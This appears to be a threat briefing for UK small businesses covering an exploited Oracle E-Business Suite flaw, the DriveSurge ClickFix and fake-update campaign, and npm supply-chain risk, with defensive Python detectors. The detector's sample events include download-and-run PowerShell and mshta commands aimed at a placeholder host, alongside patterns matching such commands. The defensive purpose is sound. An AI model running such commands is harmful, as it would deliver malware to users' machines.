Threat Analysis: Oracle EBS Under Active Exploitation and the DriveSurge Drive-By Campaign, What UK SMBs Need to Know

Threats & Attacks

Hello, Mauven here.

This is your Daily Threat Analysis for 29th June 2026.

Two stories today. One is a known vulnerability class being actively exploited against software that sits at the heart of business operations. The other is a quieter threat, the kind that does not generate headlines until the breach notifications start going out. Both have direct implications for UK SMBs, including organisations that do not run the affected software themselves.

Oracle E-Business Suite: CVE-2026-46817 Is Being Exploited Right Now

Let us start with the most pressing item. Threat intelligence company Defused has confirmed that CVE-2026-46817, a critical vulnerability in Oracle E-Business Suite, is under active exploitation in the wild. At time of writing, this has not appeared on CISA’s Known Exploited Vulnerabilities catalogue, but the confirmation of in-the-wild exploitation is sufficient reason to treat it as a priority.

Oracle E-Business Suite is enterprise financial and HR management software. It handles procurement, payroll, accounts payable, and supply chain functions for large organisations. The immediate audience for this advisory is, on the face of it, large enterprises. Not your concern if you are running a twenty-person professional services firm.

Except it is, and here is why.

Also confirmed today: Nissan has disclosed that attackers breached its Oracle PeopleSoft instance, a related Oracle enterprise platform, and may have exfiltrated payroll records and social security numbers. Nissan is pointing to an “unknown flaw” as the root cause, which at this stage is less informative than it sounds. What it tells you is that Oracle’s enterprise product portfolio is under active, sustained attention from threat actors right now. These are not isolated events.

The relevance to UK SMBs is supply chain exposure. If your payroll is outsourced to a bureau that runs Oracle EBS, if your primary customer is a manufacturer using Oracle for procurement, if your accountancy firm manages clients on Oracle, you are downstream of this risk. You do not have to run the vulnerable software yourself to be affected by a breach of someone who does.

The NCSC has published guidance on supply chain cyber security. The fact that most organisations still cannot name the software platforms their critical suppliers run on tells you everything about how seriously that guidance is being applied.

What to do if you use Oracle EBS directly: Oracle released its Critical Patch Update (CPU) for June 2026. Verify your patch status against that CPU immediately, and do it for every environment that holds live data: a disaster-recovery or test clone of EBS with real payroll in it is as attractive a target as production. If you are on a managed Oracle environment, get written confirmation from your provider that the patch has been applied, naming the patch and the environments it went on to.

What to do if you are downstream: Ask your payroll bureau, financial software provider, and any tier-one supplier whether they run Oracle EBS or PeopleSoft, and request confirmation of their patch status. You will not always get a straight answer. The fact that you asked creates a paper trail that matters if something goes wrong later.

DriveSurge: The Initial Access Broker You Have Not Heard Of Yet

The second story requires more context, because the mechanics of it are not immediately obvious.

Silent Push has published research identifying DriveSurge, a newly documented threat actor operating as an Initial Access Broker on a Pay-Per-Install model. In plain terms: DriveSurge compromises legitimate websites, injects malicious code, and then sells the resulting access to victim machines to other criminal operators, ransomware groups, credential thieves, whoever is buying.

The infection chain works like this. An employee visits a legitimate website, one they may have visited dozens of times. The injected code silently passes them through a Traffic Distribution System (Silent Push identifies it as zTDS), which profiles the visitor and redirects them to one of two delivery mechanisms: FakeUpdates, which presents a convincing browser update prompt, or ClickFix, which presents a fake CAPTCHA or error page whose instructions trick the user into running a malicious script themselves, typically by placing a command on their clipboard and telling them to paste it into a system dialog.

Neither technique requires the user to open an email attachment. Neither requires them to click on an obviously suspicious link. The user visits a normal-looking website, sees what appears to be a routine browser prompt, and follows it. The malware executes.
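Because both techniques end with the user, not an exploit, launching the payload, the endpoint signal is a script host started from the wrong parent. The following is an added example, not code from the briefing or from Silent Push's research: it runs simple detection logic over constructed process-creation events (fields loosely modelled on a Sysmon process-create record, so map them to your own telemetry). It assumes the widely documented ClickFix pattern, where the command pasted into the Run dialog runs under explorer.exe, and the FakeUpdates pattern, where the user opens a downloaded "update" script with wscript.exe; the interpreter list, argument patterns and sample events are the author's assumptions.

```python
"""Flag process-creation events consistent with ClickFix and FakeUpdates.
Added example with constructed events; not the page's or Silent Push's code."""
import re

# Script hosts and download utilities that drive-by lures tell victims to run.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Command-line traits common to ClickFix one-liners: encoded commands, hidden
# windows, download-and-execute cmdlets, remote HTA/script files.
SUSPICIOUS_ARGS = [
    re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"\b(?:iex|iwr|invoke-expression|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
    re.compile(r"https?://\S+?\.(?:hta|ps1|js|vbs|bat)\b", re.I),
]
# A script file in the Downloads folder with an update/browser name in it.
FAKEUPDATE_DOWNLOAD = re.compile(
    r"\\downloads\\[^\\]*(?:update|chrome|edge|firefox)[^\\]*\.(?:js|zip)", re.I)


def classify(event):
    """Return a reason string if the event looks like a drive-by payload, else None."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    child = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    # ClickFix: the Run dialog executes under explorer.exe, so an interpreter
    # with download/encoded arguments whose parent is explorer.exe (not a
    # terminal, scheduler or admin tool) is the signal.
    if parent == "explorer.exe" and child in INTERPRETERS:
        if any(p.search(cmd) for p in SUSPICIOUS_ARGS):
            return "clickfix: interpreter spawned by explorer.exe with download/encoded args"
    # FakeUpdates: the user double-clicks the downloaded 'update' script.
    if child in ("wscript.exe", "cscript.exe") and FAKEUPDATE_DOWNLOAD.search(cmd):
        return "fakeupdates: script host running a browser-downloaded 'update' file"
    # A browser directly spawning a script host is not normal in any workflow.
    if parent in BROWSERS and child in INTERPRETERS:
        return "browser spawned interpreter"
    return None


def scan(events):
    """Return [(event id, reason)] for every event that classify() flags."""
    return [(e["id"], r) for e in events if (r := classify(e))]


# Constructed sample events (not real telemetry); hostnames are .invalid.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://lure.invalid/a.txt)"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://lure.invalid/verify.hta"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'wscript.exe "C:\Users\jo\Downloads\Chrome_Update_v126.js"'},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",            # user opened a shell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell"},
    {"id": 5, "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c whoami"},
    {"id": 6, "parent_image": r"C:\Windows\System32\cmd.exe",        # admin batch job
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for event_id, reason in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Event 4 (a user simply opening PowerShell) and event 6 (a hidden-window script launched from a batch job) are left alone: the parent check is what keeps this usable on a real estate, since hidden windows and download cmdlets on their own appear constantly in legitimate administration.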

The scale matters here. Silent Push reports thousands of compromised websites in this campaign. The operator is not targeting specific organisations, it is casting a wide net and selling whatever lands.

For UK SMBs, the implications are direct. Your staff browse the web. Some of the sites they visit are already compromised. Email-centric controls (spam filtering, SPF/DKIM, attachment scanning) do not address this vector at all, because nothing arrives by email: the malicious prompt is served by a site the user chose to visit.

What to check: Whether your web filtering solution blocks known zTDS redirect infrastructure. If you do not have a web filtering solution, this is a conversation to have with your IT provider today, not next quarter.

What to tell your staff: Browser update prompts that appear in the middle of browsing a website are not legitimate. Legitimate browser updates come through the browser’s own update mechanism, not through a webpage. The same goes for any page, CAPTCHA or error message that asks them to press keyboard shortcuts (the usual ClickFix instruction is Windows+R, then paste, then Enter), run a script, or download and open an executable: report it immediately rather than follow it.

This is not complex awareness training. It is one sentence. The challenge is getting that sentence in front of every person in your organisation before DriveSurge gets there first.

On the Sidelines: AI Tooling and Supply Chain Risk

Two items in today’s intelligence feed are worth flagging without extended analysis, because they speak to a broader pattern.

First, CVE-2026-55255 in Langflow, an open-source framework for building AI agents and data pipelines, saw its first confirmed active exploitation on 25th June. Sysdig’s research makes an important point about it: CVE-2026-55255 is an IDOR flaw scored CVSS 9.9, yet a lower-scored RCE in the same product (CVE-2026-33017, CVSS 9.3) has been exploited far more widely, because the RCE requires no authentication. CVSS measures potential impact, not exploitation likelihood; an unauthenticated bug with a lower score will usually be hit first. If your organisation is experimenting with AI tooling built on open-source frameworks, the security posture of that tooling deserves the same scrutiny as any other production system, starting with whether it is reachable from the internet without authentication.

Second, the Miasma Mini Shai-Hulud supply chain campaign has compromised npm packages under the @immobiliarelabs scope, specifically targeting Backstage plugins used for GitLab integration and LDAP authentication. If your development team uses Backstage or any CI/CD tooling that pulls from npm, check your dependency trees against the affected package versions. Socket.dev has published the full indicator list.
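A dependency-tree check has to look at what is actually installed, including packages nested several levels down, not just what package.json names. The following is an added example, not the briefing's code and not Socket.dev's tooling: it walks an npm package-lock.json (lockfile v2/v3, which lists every installed package by path, and the older v1 nested tree) and reports exact name-plus-version matches against an indicator list. The indicator versions are invented placeholders and the two package names are assumed to match the page's description of the affected plugins; replace both with Socket.dev's published list before using this on a real repository. The lockfile fragments are constructed.

```python
"""Check an npm lockfile for compromised package versions.
Added example; indicator versions are placeholders, not the real IOCs."""
import json

# Assumption: package names chosen to match the page's description; the
# version strings are made up. Substitute the published indicator list.
INDICATORS = {
    "@immobiliarelabs/backstage-plugin-gitlab": {"9.9.9"},
    "@immobiliarelabs/backstage-plugin-ldap-auth": {"9.9.9", "9.9.10"},
}
WATCH_SCOPE = "@immobiliarelabs/"   # anything else in the scope is flagged for review


def package_name(lock_key):
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (text after the last node_modules/)."""
    return lock_key.rsplit("node_modules/", 1)[-1]


def iter_installed(lock):
    """Yield (name, version, install path) for every installed package.
    Lockfile v2/v3 keeps a flat 'packages' map keyed by install path;
    v1 keeps a nested 'dependencies' tree, which is walked recursively."""
    if lock.get("lockfileVersion", 1) >= 2:
        for key, meta in lock.get("packages", {}).items():
            if key:  # "" is the root project itself, not a dependency
                yield package_name(key), meta.get("version"), key
        return

    def walk(deps, prefix):
        for name, meta in deps.items():
            path = f"{prefix}node_modules/{name}"
            yield name, meta.get("version"), path
            yield from walk(meta.get("dependencies", {}), path + "/")

    yield from walk(lock.get("dependencies", {}), "")


def check_lock(lock, indicators=INDICATORS, scope=WATCH_SCOPE):
    """Return findings: 'compromised' for an exact name+version hit,
    'review' for any other package in the watched scope."""
    findings = []
    for name, version, path in iter_installed(lock):
        if name in indicators and version in indicators[name]:
            status = "compromised"
        elif name.startswith(scope):
            status = "review"
        else:
            continue
        findings.append({"path": path, "name": name, "version": version, "status": status})
    return findings


def check_lock_file(path):
    """Convenience wrapper for a real package-lock.json on disk."""
    with open(path, encoding="utf-8") as fh:
        return check_lock(json.load(fh))


# Constructed lockfile v3 fragment (not from any real project). The matching
# version sits nested under another package, which a top-level-only check misses.
SAMPLE_LOCK_V3 = json.loads("""
{
  "name": "portal", "lockfileVersion": 3,
  "packages": {
    "": {"name": "portal", "version": "1.0.0"},
    "node_modules/@backstage/core-plugin-api": {"version": "1.9.0"},
    "node_modules/@immobiliarelabs/backstage-plugin-gitlab": {"version": "6.0.0"},
    "node_modules/some-wrapper": {"version": "2.1.0"},
    "node_modules/some-wrapper/node_modules/@immobiliarelabs/backstage-plugin-ldap-auth": {"version": "9.9.9"}
  }
}
""")

# Constructed lockfile v1 fragment exercising the nested-tree path.
SAMPLE_LOCK_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "some-wrapper": {"version": "2.1.0", "dependencies": {
            "@immobiliarelabs/backstage-plugin-gitlab": {"version": "9.9.9"}}},
    },
}

if __name__ == "__main__":
    for f in check_lock(SAMPLE_LOCK_V3) + check_lock(SAMPLE_LOCK_V1):
        print(f"{f['status']:<11} {f['name']}@{f['version']}  ({f['path']})")
```

Run it against each repository's lockfile (and the lockfile of every CI image that installs from npm), not only the one the developers have checked out: a stale copy baked into a build container is the one most likely to be missed.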

Summary: Actions for Today

  • Oracle EBS users: Verify patch status against Oracle’s June 2026 CPU. Get written confirmation from managed service providers.
  • Everyone else: Ask critical suppliers, payroll, finance, logistics, whether they run Oracle EBS or PeopleSoft, and request patch confirmation in writing.
  • Web browsing hygiene: Brief staff that browser update prompts appearing mid-session on websites are a red flag and should be reported, not followed.
  • Web filtering: Confirm with your IT provider that your web filtering blocks zTDS redirect infrastructure.
  • AI and dev tooling: If you are running Langflow or Backstage-based pipelines, check your patch status and npm dependency trees today.

None of this requires a large security budget. It requires someone to make the calls and send the emails. If that person is you, do it today.


If Threat Analysis is useful to you, follow the show wherever you listen so tomorrow’s briefing lands automatically, and if someone in your network needs this, send it to them now. One forward today might be the heads-up that actually matters.


Sources

  • BleepingComputer, “Hackers now exploit critical Oracle E-Business flaw in attacks”: https://www.bleepingcomputer.com/news/security/new-oracle-e-business-suite-flaw-now-exploited-in-attacks/
  • The Register, “Nissan says Oracle PeopleSoft break-in may have spilled payroll records, SSNs”: https://www.theregister.com/security/2026/06/29/nissan-says-oracle-peoplesoft-break-in-may-have-spilled-payroll-records-ssns/5263534
  • Silent Push, “A New Threat Actor Using ClickFix and Fake Update Drive-By Attacks in Thousands of Compromised Sites”: https://www.silentpush.com/blog/drivesurge/
  • Sysdig, “Understanding Langflow CVE-2026-55255, and why higher CVSS vulnerabilities aren’t always the most exploited”: https://www.sysdig.com/blog/understanding-langflow-cve-2026-55255-and-why-higher-cvss-vulnerabilities-arent-always-the-most-exploited
  • Socket.dev, “Miasma Mini Shai-Hulud Hits ImmobiliareLabs npm Packages”: https://socket.dev/blog/miasma-mini-shai-hulud-hits-immobiliarelabs-npm-packages

Filed under

  • smb-security
  • uk-business
  • vendor-risk
  • supply-chain-risk
  • credential-theft
  • business-risk
  • incident-response